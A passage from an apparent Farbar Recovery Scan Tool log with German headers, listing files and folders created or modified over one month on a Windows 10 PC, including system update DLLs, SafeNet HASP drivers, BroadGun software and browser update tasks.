2016-11-10 06:36 - 2016-11-02 11:30 - 00058880 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Shell.Search.UriHandler.dll
2016-11-10 06:36 - 2016-11-02 11:29 - 00418304 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.BlockedShutdown.dll
2016-11-10 06:36 - 2016-11-02 11:29 - 00211968 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2016-11-10 06:36 - 2016-11-02 11:28 - 00748544 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll
2016-11-10 06:36 - 2016-11-02 11:28 - 00260608 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe
2016-11-10 06:36 - 2016-11-02 11:28 - 00252928 _____ (Microsoft Corporation) C:\WINDOWS\system32\ubpm.dll
2016-11-10 06:36 - 2016-11-02 11:28 - 00240640 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkDesktopSettings.dll
2016-11-10 06:36 - 2016-11-02 11:27 - 01388544 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Cred.dll
2016-11-10 06:36 - 2016-11-02 11:27 - 00545792 _____ (Microsoft Corporation) C:\WINDOWS\system32\timedate.cpl
2016-11-10 06:36 - 2016-11-02 11:27 - 00495104 _____ (Microsoft Corporation) C:\WINDOWS\system32\DataSenseHandlers.dll
2016-11-10 06:36 - 2016-11-02 11:26 - 00388608 _____ (Microsoft Corporation) C:\WINDOWS\system32\zipfldr.dll
2016-11-10 06:36 - 2016-11-02 11:26 - 00273920 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIAnimation.dll
2016-11-10 06:36 - 2016-11-02 11:26 - 00049152 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Shell.dll
2016-11-10 06:36 - 2016-11-02 11:25 - 00655872 _____ (Microsoft Corporation) C:\WINDOWS\system32\sud.dll
2016-11-10 06:36 - 2016-11-02 11:25 - 00541696 _____ (Microsoft Corporation) C:\WINDOWS\system32\ipnathlp.dll
2016-11-10 06:36 - 2016-11-02 11:25 - 00496128 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettings.UserAccountsHandlers.dll
2016-11-10 06:36 - 2016-11-02 11:23 - 02104320 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlidsvc.dll
2016-11-10 06:36 - 2016-11-02 11:22 - 04749312 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2016-11-10 06:36 - 2016-11-02 11:19 - 08127488 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2016-11-10 06:36 - 2016-11-02 11:19 - 08075776 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll
2016-11-10 06:36 - 2016-11-02 11:19 - 00981504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.OnlineId.dll
2016-11-10 06:36 - 2016-11-02 11:19 - 00089088 _____ (Microsoft Corporation) C:\WINDOWS\system32\asycfilt.dll
2016-11-10 06:36 - 2016-11-02 11:18 - 00243712 _____ (Microsoft Corporation) C:\WINDOWS\system32\shdocvw.dll
2016-11-10 06:36 - 2016-11-02 11:17 - 04746752 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2016-11-10 06:36 - 2016-11-02 11:17 - 01282048 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwansvc.dll
2016-11-10 06:36 - 2016-11-02 11:17 - 00909824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Search.dll
2016-11-10 06:36 - 2016-11-02 11:17 - 00389632 _____ (Microsoft Corporation) C:\WINDOWS\system32\stobject.dll
2016-11-10 06:36 - 2016-11-02 11:16 - 04148736 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcorets.dll
2016-11-10 06:36 - 2016-11-02 11:16 - 03133440 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcore.dll
2016-11-10 06:36 - 2016-11-02 11:16 - 02688512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll
2016-11-10 06:36 - 2016-11-02 11:16 - 02512384 _____ (Microsoft Corporation) C:\WINDOWS\system32\themecpl.dll
2016-11-10 06:36 - 2016-11-02 11:16 - 01359360 _____ (Microsoft Corporation) C:\WINDOWS\system32\usercpl.dll
2016-11-10 06:36 - 2016-11-02 11:15 - 03616768 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2016-11-10 06:36 - 2016-11-02 11:15 - 01513472 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2016-11-10 06:36 - 2016-11-02 11:15 - 01348608 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifinetworkmanager.dll
2016-11-10 06:36 - 2016-11-02 11:15 - 00842240 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntshrui.dll
2016-11-10 06:36 - 2016-11-02 11:15 - 00483328 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinapi.dll
2016-11-10 06:36 - 2016-11-02 11:14 - 01726976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Immersive.dll
2016-11-10 06:36 - 2016-11-02 11:13 - 03496960 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVidCtl.dll
2016-11-10 06:36 - 2016-11-02 11:13 - 03299840 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstsc.exe
2016-11-10 06:36 - 2016-11-02 09:20 - 00446896 _____ C:\WINDOWS\system32\ApnDatabase.xml
2016-11-10 06:35 - 2016-11-02 12:20 - 00378720 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll
2016-11-10 06:35 - 2016-11-02 12:15 - 01051112 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2016-11-10 06:35 - 2016-11-02 12:15 - 00894096 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2016-11-10 06:35 - 2016-11-02 12:13 - 01354320 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2016-11-10 06:35 - 2016-11-02 12:13 - 01173496 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2016-11-10 06:35 - 2016-11-02 12:12 - 00376672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\clfs.sys
2016-11-10 06:35 - 2016-11-02 12:04 - 02678056 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d10warp.dll
2016-11-10 06:35 - 2016-11-02 12:03 - 02750936 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2016-11-10 06:35 - 2016-11-02 12:02 - 00848736 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupEngine.dll
2016-11-10 06:35 - 2016-11-02 12:02 - 00682816 _____ (Microsoft Corporation) C:\WINDOWS\system32\wer.dll
2016-11-10 06:35 - 2016-11-02 12:02 - 00238056 _____ (Microsoft Corporation) C:\WINDOWS\system32\weretw.dll
2016-11-10 06:35 - 2016-11-02 12:02 - 00148832 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupApi.dll
2016-11-10 06:35 - 2016-11-02 12:00 - 04130432 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
2016-11-10 06:35 - 2016-11-02 12:00 - 01274712 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2016-11-10 06:35 - 2016-11-02 12:00 - 01061968 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll
2016-11-10 06:35 - 2016-11-02 11:59 - 04673304 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2016-11-10 06:35 - 2016-11-02 11:56 - 01609920 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d9.dll
2016-11-10 06:35 - 2016-11-02 11:56 - 01572768 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll
2016-11-10 06:35 - 2016-11-02 11:56 - 00628552 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2016-11-10 06:35 - 2016-11-02 11:55 - 00048992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\iorate.sys
2016-11-10 06:35 - 2016-11-02 11:38 - 22563840 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2016-11-10 06:35 - 2016-11-02 11:32 - 00045056 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll
2016-11-10 06:35 - 2016-11-02 11:32 - 00040448 _____ (Microsoft Corporation) C:\WINDOWS\system32\efsext.dll
2016-11-10 06:35 - 2016-11-02 11:31 - 00226304 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcTok.exe
2016-11-10 06:35 - 2016-11-02 11:31 - 00097792 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2016-11-10 06:35 - 2016-11-02 11:31 - 00069632 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininetlui.dll
2016-11-10 06:35 - 2016-11-02 11:30 - 00635904 _____ (Microsoft Corporation) C:\WINDOWS\system32\FlightSettings.dll
2016-11-10 06:35 - 2016-11-02 11:30 - 00567296 _____ (Microsoft Corporation) C:\WINDOWS\system32\DevicePairing.dll
2016-11-10 06:35 - 2016-11-02 11:30 - 00109056 _____ (Microsoft Corporation) C:\WINDOWS\system32\dab.dll
2016-11-10 06:35 - 2016-11-02 11:29 - 00336896 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkBindingEngineMigPlugin.dll
2016-11-10 06:35 - 2016-11-02 11:29 - 00314880 _____ (Microsoft Corporation) C:\WINDOWS\system32\FSClient.dll
2016-11-10 06:35 - 2016-11-02 11:29 - 00296960 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsensorgroup.dll
2016-11-10 06:35 - 2016-11-02 11:29 - 00276992 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll
2016-11-10 06:35 - 2016-11-02 11:29 - 00139264 _____ (Microsoft Corporation) C:\WINDOWS\system32\iepeers.dll
2016-11-10 06:35 - 2016-11-02 11:28 - 00690176 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2016-11-10 06:35 - 2016-11-02 11:28 - 00566784 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActionCenterCPL.dll
2016-11-10 06:35 - 2016-11-02 11:28 - 00432128 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpAXHolder.dll
2016-11-10 06:35 - 2016-11-02 11:28 - 00411136 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCenter.dll
2016-11-10 06:35 - 2016-11-02 11:28 - 00321024 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkUXBroker.dll
2016-11-10 06:35 - 2016-11-02 11:28 - 00279552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.HumanInterfaceDevice.dll
2016-11-10 06:35 - 2016-11-02 11:28 - 00274432 _____ (Microsoft Corporation) C:\WINDOWS\system32\ListSvc.dll
2016-11-10 06:35 - 2016-11-02 11:28 - 00115200 _____ (Microsoft Corporation) C:\WINDOWS\system32\IdCtrls.dll
2016-11-10 06:35 - 2016-11-02 11:28 - 00088576 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
2016-11-10 06:35 - 2016-11-02 11:27 - 23677952 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2016-11-10 06:35 - 2016-11-02 11:27 - 00631296 _____ (Microsoft Corporation) C:\WINDOWS\system32\WlanMediaManager.dll
2016-11-10 06:35 - 2016-11-02 11:27 - 00261632 _____ (Microsoft Corporation) C:\WINDOWS\system32\indexeddbserver.dll
2016-11-10 06:35 - 2016-11-02 11:26 - 00579072 _____ (Microsoft Corporation) C:\WINDOWS\system32\ddraw.dll
2016-11-10 06:35 - 2016-11-02 11:26 - 00278016 _____ (Microsoft Corporation) C:\WINDOWS\system32\netplwiz.dll
2016-11-10 06:35 - 2016-11-02 11:24 - 03778560 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2016-11-10 06:35 - 2016-11-02 11:24 - 00940032 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontext.dll
2016-11-10 06:35 - 2016-11-02 11:23 - 00101888 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bowser.sys
2016-11-10 06:35 - 2016-11-02 11:22 - 13441024 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmp.dll
2016-11-10 06:35 - 2016-11-02 11:22 - 13081600 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-11-10 06:35 - 2016-11-02 11:22 - 00369664 _____ (Microsoft Corporation) C:\WINDOWS\system32\msinfo32.exe
2016-11-10 06:35 - 2016-11-02 11:21 - 05111296 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdp.dll
2016-11-10 06:35 - 2016-11-02 11:19 - 01586176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Globalization.dll
2016-11-10 06:35 - 2016-11-02 11:19 - 00805888 _____ (Microsoft Corporation) C:\WINDOWS\system32\FrameServer.dll
2016-11-10 06:35 - 2016-11-02 11:19 - 00154112 _____ (Microsoft Corporation) C:\WINDOWS\system32\NPSM.dll
2016-11-10 06:35 - 2016-11-02 11:19 - 00130560 _____ (Microsoft Corporation) C:\WINDOWS\system32\chartv.dll
2016-11-10 06:35 - 2016-11-02 11:18 - 00991232 _____ (Microsoft Corporation) C:\WINDOWS\system32\comdlg32.dll
2016-11-10 06:35 - 2016-11-02 11:18 - 00836608 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcRefreshTask.dll
2016-11-10 06:35 - 2016-11-02 11:17 - 00982528 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcomm.dll
2016-11-10 06:35 - 2016-11-02 11:16 - 03400192 _____ (Microsoft Corporation) C:\WINDOWS\system32\SyncCenter.dll
2016-11-10 06:35 - 2016-11-02 11:16 - 02669056 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2016-11-10 06:35 - 2016-11-02 11:16 - 01779712 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2016-11-10 06:35 - 2016-11-02 11:16 - 01637888 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
2016-11-10 06:35 - 2016-11-02 11:16 - 01490944 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2016-11-10 06:35 - 2016-11-02 11:16 - 00770560 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll
2016-11-10 06:35 - 2016-11-02 11:16 - 00629248 _____ (Microsoft Corporation) C:\WINDOWS\system32\hgcpl.dll
2016-11-10 06:35 - 2016-11-02 11:16 - 00579072 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockAppBroker.dll
2016-11-10 06:35 - 2016-11-02 11:16 - 00308736 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActionCenter.dll
2016-11-10 06:35 - 2016-11-02 11:16 - 00265728 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupSvc.dll
2016-11-10 06:35 - 2016-11-02 11:15 - 04708864 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExplorerFrame.dll
2016-11-10 06:35 - 2016-11-02 11:15 - 02611200 _____ (Microsoft Corporation) C:\WINDOWS\system32\gameux.dll
2016-11-10 06:35 - 2016-11-02 11:13 - 00322048 _____ (Microsoft Corporation) C:\WINDOWS\system32\GlobCollationHost.dll
2016-11-10 06:34 - 2016-11-02 12:20 - 00590960 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
2016-11-10 06:34 - 2016-11-02 12:03 - 00714592 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vhdmp.sys
2016-11-10 06:34 - 2016-11-02 12:00 - 00534096 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEng.dll
2016-11-10 06:34 - 2016-11-02 11:31 - 00198656 _____ (Microsoft Corporation) C:\WINDOWS\system32\BcastDVRHelper.dll
2016-11-10 06:34 - 2016-11-02 11:31 - 00170496 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppCapture.dll
2016-11-10 06:34 - 2016-11-02 11:31 - 00159232 _____ (Microsoft Corporation) C:\WINDOWS\system32\ACPBackgroundManagerPolicy.dll
2016-11-10 06:34 - 2016-11-02 11:28 - 00324608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.LockScreen.dll
2016-11-10 06:34 - 2016-11-02 11:27 - 00605184 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcastdvr.exe
2016-11-10 06:34 - 2016-11-02 11:25 - 00956416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2016-11-10 06:34 - 2016-11-02 11:23 - 00072704 _____ (Microsoft Corporation) C:\WINDOWS\system32\ErrorDetailsUpdate.dll
2016-11-10 06:34 - 2016-11-02 11:22 - 00337920 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2016-11-10 06:34 - 2016-11-02 11:21 - 00942080 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2016-11-10 06:34 - 2016-11-02 11:20 - 02273792 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2016-11-10 06:34 - 2016-11-02 11:20 - 00167936 _____ (Microsoft Corporation) C:\WINDOWS\system32\ErrorDetails.dll
2016-11-10 06:34 - 2016-11-02 11:18 - 01690112 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2016-11-10 06:34 - 2016-11-02 11:17 - 00828416 _____ (Microsoft Corporation) C:\WINDOWS\system32\appwiz.cpl
2016-11-10 06:34 - 2016-11-02 11:16 - 00881664 _____ (Microsoft Corporation) C:\WINDOWS\system32\authui.dll
2016-11-09 06:58 - 2016-11-09 06:58 - 00329467 _____ C:\Users\Patrick\Kfz_12181232_06112016173912_1.pdf
2016-11-06 23:21 - 2014-06-26 14:52 - 00140208 _____ C:\WINDOWS\SysWOW64\bgsresit.dll
2016-11-06 23:21 - 2014-06-26 14:52 - 00137648 _____ C:\WINDOWS\SysWOW64\bgsrespt.dll
2016-11-06 23:21 - 2014-06-26 14:52 - 00136624 _____ C:\WINDOWS\SysWOW64\bgsrespl.dll
2016-11-06 23:21 - 2014-06-26 14:52 - 00133040 _____ C:\WINDOWS\SysWOW64\bgsresda.dll
2016-11-06 23:21 - 2013-08-01 15:11 - 04609928 _____ (SafeNet Inc.) C:\WINDOWS\system32\hasplms.exe
2016-11-06 23:21 - 2013-08-01 15:11 - 04609928 _____ (SafeNet Inc.) C:\WINDOWS\system32\aksllmtp.exe
2016-11-06 23:21 - 2013-08-01 15:11 - 00140736 _____ (SafeNet Inc.) C:\WINDOWS\system32\Drivers\aksfridge.sys
2016-11-06 23:21 - 2013-08-01 15:11 - 00091784 _____ (SafeNet Inc.) C:\WINDOWS\system32\Drivers\aksdf.sys
2016-11-06 23:19 - 2016-11-06 23:19 - 00000000 ____D C:\ProgramData\3D Systems
2016-11-06 18:10 - 2016-11-06 18:10 - 00000000 ____D C:\Users\Patrick\AppData\Roaming\DassaultSystemes
2016-11-06 18:10 - 2016-11-06 18:10 - 00000000 ____D C:\Users\Patrick\AppData\Local\DassaultSystemes
2016-11-06 18:10 - 2016-11-06 18:10 - 00000000 ____D C:\ProgramData\DassaultSystemes
2016-11-06 17:39 - 2014-06-30 13:42 - 07642544 _____ (BroadGun Software Pty Ltd) C:\WINDOWS\SysWOW64\bgsview.exe
2016-11-06 17:39 - 2014-06-26 14:52 - 00142768 _____ C:\WINDOWS\SysWOW64\bgsreses.dll
2016-11-06 17:39 - 2014-06-26 14:52 - 00141232 _____ C:\WINDOWS\SysWOW64\bgsresfr.dll
2016-11-06 17:39 - 2014-06-26 14:52 - 00136112 _____ C:\WINDOWS\SysWOW64\bgsresde.dll
2016-11-06 17:39 - 2014-06-26 14:52 - 00134576 _____ C:\WINDOWS\SysWOW64\bgsresen.dll
2016-11-06 17:39 - 2014-06-26 11:55 - 00474032 _____ (Broadgun Software Pty Ltd) C:\WINDOWS\SysWOW64\bgsofice.dll
2016-11-06 17:39 - 2014-06-26 11:55 - 00269232 _____ (Broadgun Software) C:\WINDOWS\SysWOW64\bgstb.dll
2016-11-06 17:39 - 2014-06-26 11:55 - 00204720 _____ (Broadgun Software) C:\WINDOWS\SysWOW64\bgsmsnd.exe
2016-11-06 17:39 - 2014-06-26 11:55 - 00066480 _____ C:\WINDOWS\system32\bgspm64.dll
2016-11-06 17:39 - 2013-03-17 13:35 - 00439864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSHFLXGD.OCX
2016-11-06 17:39 - 2013-03-17 13:12 - 00646952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OC30.DLL
2016-11-06 17:39 - 2009-03-20 09:03 - 00516832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bgscapi.dll
2016-11-06 17:24 - 2016-11-06 17:26 - 00000000 ____D C:\Users\Patrick\TK
2016-11-06 17:24 - 2016-11-06 17:24 - 00000000 ____D C:\Users\Patrick\DA Direkt
2016-11-05 04:57 - 2016-11-05 04:57 - 00000000 ____D C:\Users\Patrick\AppData\Local\Glassix
2016-11-05 04:57 - 2016-11-05 04:57 - 00000000 ____D C:\Users\Patrick\AppData\Local\Crashpad
2016-11-05 00:26 - 2016-11-05 00:26 - 00000000 ____D C:\Users\Patrick\AppData\LocalLow\TeamNimbus

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2016-12-05 17:09 - 2016-09-24 17:13 - 00000514 _____ C:\WINDOWS\Tasks\Systemaktualisierung von Yandex Browser.job
2016-12-05 17:09 - 2016-09-24 17:13 - 00000452 _____ C:\WINDOWS\Tasks\Aktualisierung von Yandex Browser.job
2016-12-05 17:09 - 2016-09-24 16:26 - 00000000 ____D C:\ProgramData\NVIDIA
2016-12-05 17:09 - 2015-12-22 21:42 - 00000000 __SHD C:\Users\Patrick\IntelGraphicsProfiles
2016-12-05 07:38 - 2016-09-24 16:27 - 00000000 ____D C:\Users\Patrick
2016-12-05 07:38 - 2015-12-23 10:42 - 00000000 ____D C:\Program Files (x86)\Steam
2016-12-05 06:04 - 2016-08-21 15:32 - 00000436 _____ C:\WINDOWS\Tasks\Update for Yandex Browser.job
2016-12-04 23:50 - 2016-09-24 16:25 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
2016-12-04 18:22 - 2016-01-10 15:00 - 00000000 ____D C:\Users\Patrick\AppData\LocalLow\SogouPy
2016-12-04 15:47 - 2015-12-22 17:17 - 00000000 ____D C:\Users\Patrick\Visum
2016-12-04 15:03 - 2016-02-16 19:53 - 00000000 ____D C:\Users\Patrick\Documents\HiSuite
2016-12-03 21:34 - 2016-09-24 17:19 - 00278998 _____ C:\WINDOWS\system32\prfh0804.dat
2016-12-03 21:34 - 2016-09-24 17:19 - 00194016 _____ C:\WINDOWS\system32\prfc0804.dat
2016-12-03 21:34 - 2016-07-16 23:51 - 01050566 _____ C:\WINDOWS\system32\perfh007.dat
2016-12-03 21:34 - 2016-07-16 23:51 - 00248932 _____ C:\WINDOWS\system32\perfc007.dat
2016-12-03 21:34 - 2015-12-22 21:42 - 02997684 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-12-03 21:27 - 2016-09-24 16:35 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-12-03 21:27 - 2016-07-16 07:04 - 00262144 _____ C:\WINDOWS\system32\config\BBI
2016-12-03 20:22 - 2016-03-28 19:25 - 00000000 ____D C:\Users\Patrick\AppData\LocalLow\Temp
2016-12-03 19:37 - 2016-07-16 12:47 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-12-03 19:34 - 2016-07-16 12:47 - 00000000 ____D C:\WINDOWS\LiveKernelReports
2016-12-03 10:38 - 2016-07-16 07:04 - 00032768 _____ C:\WINDOWS\system32\config\ELAM
2016-12-02 23:41 - 2015-12-22 22:34 - 00001374 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-12-02 23:41 - 2015-12-22 21:48 - 00001137 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2016-12-02 23:13 - 2016-07-08 23:01 - 00000008 __RSH C:\ProgramData\ntuser.pol
2016-12-02 23:13 - 2015-12-22 23:33 - 00000000 ____D C:\Users\Patrick\AppData\Local\CrashDumps
2016-12-02 19:31 - 2015-12-22 21:55 - 00000000 ____D C:\ProgramData\Package Cache
2016-12-02 19:21 - 2015-12-22 23:34 - 00000000 ____D C:\Users\Patrick\Documents\Tencent Files
2016-12-02 16:25 - 2016-07-16 12:47 - 00000000 ___HD C:\Program Files\WindowsApps
2016-12-02 12:32 - 2015-12-22 21:48 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-12-01 20:35 - 2015-12-23 12:48 - 00000000 ____D C:\Users\Patrick\Documents\My Games
2016-12-01 20:27 - 2015-12-22 17:15 - 00000000 ____D C:\Users\Patrick\Rechnungen
2016-11-29 06:30 - 2015-12-23 00:36 - 00000000 ____D C:\Games
2016-11-28 02:04 - 2015-12-23 11:29 - 00000000 ____D C:\Users\Patrick\AppData\Roaming\Azureus
2016-11-26 16:44 - 2015-12-23 11:29 - 00001870 _____ C:\Users\Public\Desktop\Vuze.lnk
2016-11-26 16:44 - 2015-12-23 11:29 - 00001870 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Vuze.lnk
2016-11-26 16:44 - 2015-12-23 11:29 - 00000000 ____D C:\Program Files\Vuze
2016-11-26 02:34 - 2016-07-16 23:57 - 00000000 ____D C:\Users\Patrick\AppData\Local\JDownloader v2.0
2016-11-26 01:38 - 2016-01-30 17:53 - 00000000 ____D C:\Users\Patrick\AppData\Roaming\RenPy
2016-11-24 21:18 - 2016-01-19 22:14 - 00001534 _____ C:\ProgramData\ss.ini
2016-11-24 21:02 - 2016-07-16 12:45 - 00000000 ____D C:\WINDOWS\INF
2016-11-22 17:47 - 2016-03-19 19:06 - 00000000 ____D C:\Users\Patrick\AppData\Local\MEGAsync
2016-11-22 17:18 - 2016-09-24 17:13 - 00003694 _____ C:\WINDOWS\System32\Tasks\Systemaktualisierung von Yandex Browser
2016-11-19 03:15 - 2016-09-24 16:26 - 00000000 ____D C:\Program Files\NVIDIA Corporation
2016-11-19 03:15 - 2016-07-16 12:47 - 00000000 ____D C:\WINDOWS\Help
2016-11-19 03:14 - 2016-09-24 16:26 - 00000000 ____D C:\ProgramData\NVIDIA Corporation
2016-11-19 03:14 - 2016-09-24 16:26 - 00000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2016-11-19 03:03 - 2016-09-17 12:44 - 00000946 _____ C:\WINDOWS\Tasks\Adobe Flash Player PPAPI Notifier.job
2016-11-19 03:02 - 2016-09-24 16:35 - 00002784 _____ C:\WINDOWS\System32\Tasks\klcp_update
2016-11-19 03:02 - 2016-09-24 16:30 - 00001544 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2016-11-19 03:02 - 2016-08-28 16:58 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack
2016-11-19 03:02 - 2016-08-28 16:58 - 00000000 ____D C:\Program Files\K-Lite Codec Pack
2016-11-19 02:58 - 2016-09-24 16:35 - 00004086 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player PPAPI Notifier
2016-11-19 02:58 - 2016-07-16 12:47 - 00000000 ____D C:\WINDOWS\SysWOW64\Macromed
2016-11-19 02:58 - 2016-07-16 12:47 - 00000000 ____D C:\WINDOWS\system32\Macromed
2016-11-19 02:58 - 2015-12-22 22:30 - 00000000 ____D C:\Users\Patrick\AppData\Local\Adobe
2016-11-18 22:48 - 2016-02-16 19:53 - 00000000 ____D C:\Users\Patrick\AppData\Local\HiSuite
2016-11-18 14:42 - 2016-10-06 23:00 - 00001492 _____ C:\Users\Public\Desktop\GeForce Experience.lnk
2016-11-18 14:42 - 2016-09-24 16:48 - 00004006 _____ C:\WINDOWS\System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2016-11-18 14:42 - 2016-09-24 16:48 - 00003978 _____ C:\WINDOWS\System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2016-11-18 14:42 - 2016-09-24 16:48 - 00003942 _____ C:\WINDOWS\System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2016-11-18 14:42 - 2016-09-24 16:48 - 00003916 _____ C:\WINDOWS\System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2016-11-18 14:42 - 2016-09-24 16:48 - 00003754 _____ C:\WINDOWS\System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2016-11-18 14:42 - 2016-09-24 16:48 - 00003712 _____ C:\WINDOWS\System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2016-11-11 19:30 - 2016-07-16 12:47 - 00000000 ____D C:\WINDOWS\rescache
2016-11-10 19:27 - 2015-12-22 21:39 - 00000000 __RHD C:\Users\Public\AccountPictures
2016-11-10 19:26 - 2016-09-24 16:25 - 00425904 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-11-10 07:18 - 2016-07-16 12:47 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2016-11-10 07:18 - 2016-07-16 12:47 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns
